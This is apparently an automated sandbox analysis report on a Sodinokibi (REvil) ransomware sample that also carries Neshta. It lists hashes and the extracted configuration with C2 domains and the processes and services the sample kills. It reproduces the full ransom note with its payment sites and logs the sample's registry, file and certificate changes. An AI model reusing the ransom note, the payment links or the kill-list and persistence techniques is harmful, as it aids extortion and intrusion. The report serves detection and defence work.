General
Target

cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe

Filesize

204KB

Completed

24-01-2022 01:14

Task

behavioral1

Score
10/10
MD5

12d2c87f6184659aeba6189dd828e062

SHA1

0b1f505a6458053f5e18fc8677b748985f669926

SHA256

cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862

SHA256

9472e0fe4ecc4afad8aa33f86fbbc0aa53003d880d12921bb0b9156d77758474fb6ccb25d175b750162abe1ebc3ea18e33f6d3898fc927afef0979c64274e4e6

Malware Config

Extracted

Path

C:\704555u-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion 704555u. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/FD5299385D96D435 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/FD5299385D96D435 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: ykr+33eN9ObSq/GN0e9GPOiG303KsoW0FPS8fVuoAZFOTpQxeuYesKQ/dZ84b9PV eBJ20aOnzhkh5P1/q0D+uJubSR0mjaSpWVwsS57LsWa7jQ1OVPQ5Dw5z2ard5bQF uIc562JISdo0bbKV5UI0y216rxNnsUpqXGOnIhC1NT7VK4N1mO/mnU4WOXuyjpoW 0/Z6v8eYKjF6E8PLt/KuyHc3pfD6315awArZABUUdnMPmH3V3X2sb+8aG33iMDBD LmMT30dBmM27wyVr553T7gDdJpao5iwI2m5iCAjC2BXYa63RFGQmin1/CBvGgPbN nmQLzx6tRuDr/Qh9BwvMXKZHyiCw+TlYVb5YULie7Vns5qn6F4LKXLSRK3j31I19 9s42fglglXV7vn8Q+0Qs872U0nrORsGpEe7kN2NBVKW3LLcrG4iTfkGWmvwrU3TT d0VbkP1MofC3WZ3m1J/gb231RIpnxav9hpqfeGdtLkXFIKsA+Zc0JUPPiahbnNoU ngMy1HtyQ5GVW664kBn8/KJuFaqnei5vRvCV+XttgYb96uYZUBfJHrKenqqxiSn8 Wx9TSozGaqnCDXc0beLohy8O4vbXIdb1mWIKKN78z8RV6dsTQwjl0tlF+M/bg9Mn VYlX3JLSfFU8dgQX+H5kqALeRfXHKNoVJTPdxiusNrgq4ezgYszJehMGQ3CaJ4vT FTw8G21ufhLby1u7EI7X4cawNpMz98d6YumLZsyxQJ7CIdVxj5KkpXai8fVOF568 xxQJb4I58qpaOPlIJxAYUvGP/qIZ1iqo2vet6wdQKuz2J4SsM1orkEZnDpy83k1l BfFwnqJ7o5RhuffXkxBjiPSHHdMRJ7vP6qqcg+hdyh2zv4F2uAe+yVHzNathtOL7 70HGahYuODDrEvonbgb+8icpBCnXIDUUZPGkji6GFpBX+MTbH8CORp6jdtstgARj Q3CcyDI80qvW+T5N+KQSkFF5RvyZ3fW6FIEvLZEy2jr1aB4hBFaQ2q44zJJuflSM Md+2UxJ8FhYnjxO754CVSE5YgX8SyJkM6t+Kr3G9nXwE0dl74fTXW/Lbhre3ZMVy d+pxSqF73nH4CnxSMT5YG7vq70OOaogG6ZKEYEo8Pyn82Mf72WKg9tnRkqRXpq62 uZU= Extension name: 704555u ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/FD5299385D96D435

http://decryptor.top/FD5299385D96D435

Extracted

Family

sodinokibi

Botnet

19

Campaign

99

C2

hekecrm.com

jax-interim-and-projectmanagement.com

donau-guides.eu

ideamode.com

valiant-voice.com

thehovecounsellingpractice.co.uk

sochi-okna23.ru

frimec-international.es

osn.ro

pinkxgayvideoawards.com

banksrl.co.za

startuplive.org

asiaartgallery.jp

11.in.ua

campusescalade.com

pubcon.com

mahikuchen.com

georgemuncey.com

azerbaycanas.com

wademurray.com

aceroprime.com

nevadaruralhousingstudies.org

liepertgrafikweb.at

levelseven.be

stage-infirmier.fr

poems-for-the-soul.ch

eyedoctordallas.com

nieuwsindeklas.be

jag.me

tages-geldvergleich.de

supercarhire.co.uk

michaelfiegel.com

alharsunindo.com

teutoradio.de

ilveshistoria.com

perfectgrin.com

ciga-france.fr

mrmac.com

photonag.com

modamarfil.com

molinum.pt

bakingismyyoga.com

sealgrinderpt.com

altitudeboise.com

xn--ziinoapte-6ld.ro

mind2muscle.nl

so-sage.fr

brisbaneosteopathic.com.au

dantreranch.com

olry-cloisons.fr

Attributes
net
true
pid
19
prc
firefoxconfig
infopath
steam
sqbcoreservice
mysqld_nt
oracle
mydesktopqos
msftesql
sqlbrowser
thebat
isqlplussvc
ocssd
sqlwriter
sqlagent
thunderbird
mysqld_opt
winword
wordpad
thebat64
visio
dbsnmp
msaccess
mydesktopservice
ocautoupds
ocomm
encsvc
excel
agntsvc
mysqld
synctime
tbirdconfig
outlook
mspub
onenote
xfssvccon
dbeng50
powerpnt
sqlservr
ransom_oneliner
All of your files are encrypted! Find {EXT}-readme.txt and follow instuctions
ransom_template
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion {EXT}. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID} 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/{UID} Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: {KEY} Extension name: {EXT} ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
sub
99
svc
veeam
vss
memtas
sophos
svc$
mepocs
backup
sql
Signatures 18

Filter: none

Collection
Credential Access
Defense Evasion
Discovery
Impact
Persistence
  • Modifies system executable filetype association
    cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe

    TTPs

    Modify RegistryChange Default File Association

    Reported IOCs

    descriptioniocprocess
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*"cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
  • Neshta

    Description

    Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.

  • Sodin,Sodinokibi,REvil

    Description

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Executes dropped EXE
    cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe

    Reported IOCs

    pidprocess
    1540cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
  • Modifies extensions of user files
    cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe

    Description

    Ransomware generally changes the extension on encrypted files.

    Tags

    Reported IOCs

    descriptioniocprocess
    File renamedC:\Users\Admin\Pictures\WaitJoin.crw => \??\c:\users\admin\pictures\WaitJoin.crw.704555ucedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
  • Loads dropped DLL
    cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe

    Reported IOCs

    pidprocess
    780cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    780cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    780cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
  • Reads user/profile data of web browsers

    Description

    Infostealers often target stored browser data, which can include saved credentials etc.

    TTPs

    Data from Local SystemCredentials in Files
  • Enumerates connected drives
    cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe

    Description

    Attempts to read the root path of hard drives other than the default C: drive.

    TTPs

    Query RegistryPeripheral Device DiscoverySystem Information Discovery

    Reported IOCs

    descriptioniocprocess
    File opened (read-only)\??\N:cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened (read-only)\??\T:cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened (read-only)\??\A:cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened (read-only)\??\F:cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened (read-only)\??\H:cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened (read-only)\??\I:cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened (read-only)\??\J:cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened (read-only)\??\M:cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened (read-only)\??\V:cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened (read-only)\??\W:cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened (read-only)\??\X:cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened (read-only)\??\Z:cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened (read-only)\??\B:cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened (read-only)\??\G:cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened (read-only)\??\O:cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened (read-only)\??\R:cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened (read-only)\??\U:cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened (read-only)\??\D:cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened (read-only)\??\K:cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened (read-only)\??\Q:cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened (read-only)\??\Y:cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened (read-only)\??\E:cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened (read-only)\??\L:cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened (read-only)\??\P:cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened (read-only)\??\S:cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
  • Drops file in System32 directory
    cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe

    Reported IOCs

    descriptioniocprocess
    File opened for modificationC:\Windows\System32\CatRoot2\dberr.txtcedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
  • Sets desktop wallpaper using registry
    cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe

    Tags

    TTPs

    DefacementModify Registry

    Reported IOCs

    descriptioniocprocess
    Set value (str)\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\h4x6jsi003.bmp"cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
  • Drops file in Program Files directory
    cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.execedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe

    Reported IOCs

    descriptioniocprocess
    File opened for modificationC:\PROGRA~2\WINDOW~1\WinMail.execedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modificationC:\PROGRA~2\INTERN~1\ieinstal.execedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modificationC:\PROGRA~2\MICROS~1\Office14\MSTORE.EXEcedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modificationC:\PROGRA~2\WINDOW~1\wab.execedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modificationC:\PROGRA~2\WI54FB~1\wmprph.execedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modificationC:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\Oarpmany.execedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modificationC:\PROGRA~2\INTERN~1\iexplore.execedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modificationC:\PROGRA~2\MOZILL~1\UNINST~1.EXEcedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modificationC:\PROGRA~2\Adobe\READER~1.0\Reader\A3DUTI~1.EXEcedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modificationC:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\FLTLDR.EXEcedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modificationC:\PROGRA~2\MICROS~1\Office14\INFOPATH.EXEcedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modificationC:\PROGRA~2\MICROS~1\Office14\VPREVIEW.EXEcedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File created\??\c:\program files (x86)\704555u-readme.txtcedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modificationC:\PROGRA~2\MICROS~1\Office14\OIS.EXEcedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modificationC:\PROGRA~2\Adobe\READER~1.0\Resource\Icons\SC_REA~1.EXEcedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modificationC:\PROGRA~2\COMMON~1\MICROS~1\TextConv\WksConv\Wkconv.execedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modificationC:\PROGRA~2\MICROS~1\Office14\CNFNOT32.EXEcedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modificationC:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\OFFICE~1\Setup.execedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification\??\c:\program files\ResumeAdd.mp4cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification\??\c:\program files\StartBackup.odtcedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File created\??\c:\program files (x86)\microsoft sql server compact edition\v3.5\desktop\704555u-readme.txtcedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modificationC:\PROGRA~2\MICROS~1\Office14\GROOVEMN.EXEcedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modificationC:\PROGRA~2\MOZILL~1\MAINTE~1.EXEcedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modificationC:\PROGRA~2\MICROS~1\Office14\MSQRY32.EXEcedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modificationC:\PROGRA~2\WI54FB~1\wmplayer.execedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modificationC:\PROGRA~2\Adobe\READER~1.0\Reader\AcroRd32.execedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modificationC:\PROGRA~2\Adobe\READER~1.0\Reader\ADOBEC~1.EXEcedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modificationC:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\MSOXMLED.EXEcedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification\??\c:\program files\SplitInstall.midicedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File created\??\c:\program files (x86)\microsoft sql server compact edition\704555u-readme.txtcedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modificationC:\PROGRA~2\MICROS~1\Office14\MSOUC.EXEcedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modificationC:\PROGRA~2\MICROS~1\Office14\ONENOTE.EXEcedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modificationC:\PROGRA~2\WI4223~1\sidebar.execedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification\??\c:\program files\ConnectClear.ramcedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification\??\c:\program files\RedoUnpublish.DVRcedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modificationC:\PROGRA~2\MICROS~1\Office14\XLICONS.EXEcedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modificationC:\PROGRA~2\COMMON~1\MICROS~1\DW\DW20.EXEcedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modificationC:\PROGRA~2\COMMON~1\MICROS~1\ink\mip.execedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification\??\c:\program files\LockConnect.vstmcedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modificationC:\PROGRA~2\COMMON~1\Adobe\Updater6\ADOBEU~1.EXEcedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification\??\c:\program files\CopyStop.3g2cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification\??\c:\program files\StepPush.xlacedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification\??\c:\program files\JoinInstall.xlsbcedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification\??\c:\program files\ProtectEdit.pcxcedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modificationC:\PROGRA~2\MICROS~1\Office14\1033\ONELEV.EXEcedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modificationC:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\OFFICE~1\ODeploy.execedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modificationC:\PROGRA~2\COMMON~1\MICROS~1\VSTO\10.0\VSTOIN~1.EXEcedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File created\??\c:\program files\704555u-readme.txtcedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modificationC:\PROGRA~2\WI54FB~1\wmpconfig.execedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modificationC:\PROGRA~2\WINDOW~2\ACCESS~1\wordpad.execedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modificationC:\PROGRA~2\Adobe\READER~1.0\Reader\ACROBR~1.EXEcedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modificationC:\PROGRA~2\MICROS~1\Office14\ACCICONS.EXEcedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modificationC:\PROGRA~2\MICROS~1\Office14\SELFCERT.EXEcedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modificationC:\PROGRA~2\COMMON~1\Adobe\Updater6\ADOBE_~1.EXEcedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modificationC:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\MSOICONS.EXEcedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification\??\c:\program files\RemoveSync.doccedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modificationC:\PROGRA~3\PACKAG~1\{F4220~1\VC_RED~1.EXEcedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modification\??\c:\program files\PublishJoin.scfcedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modificationC:\PROGRA~2\MICROS~1\Office14\GRAPH.EXEcedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modificationC:\PROGRA~2\WI54FB~1\wmpshare.execedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modificationC:\PROGRA~2\COMMON~1\MICROS~1\SOURCE~1\OSE.EXEcedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modificationC:\PROGRA~2\Google\Update\1336~1.71\GOOGLE~3.EXEcedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modificationC:\PROGRA~2\MICROS~1\Office14\MSOSYNC.EXEcedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    File opened for modificationC:\PROGRA~2\WI54FB~1\wmlaunch.execedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
  • Drops file in Windows directory
    cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe

    Reported IOCs

    descriptioniocprocess
    File opened for modificationC:\Windows\svchost.comcedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
  • Enumerates physical storage devices

    Description

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

    TTPs

    System Information Discovery
  • Modifies registry class
    cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe

    Reported IOCs

    descriptioniocprocess
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*"cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
  • Modifies system certificate store
    cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe

    TTPs

    Install Root CertificateModify Registry

    Reported IOCs

    descriptioniocprocess
    Key created\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    Set value (data)\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d578112861900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b06010505070308200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986ecedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    Key created\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184Ccedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
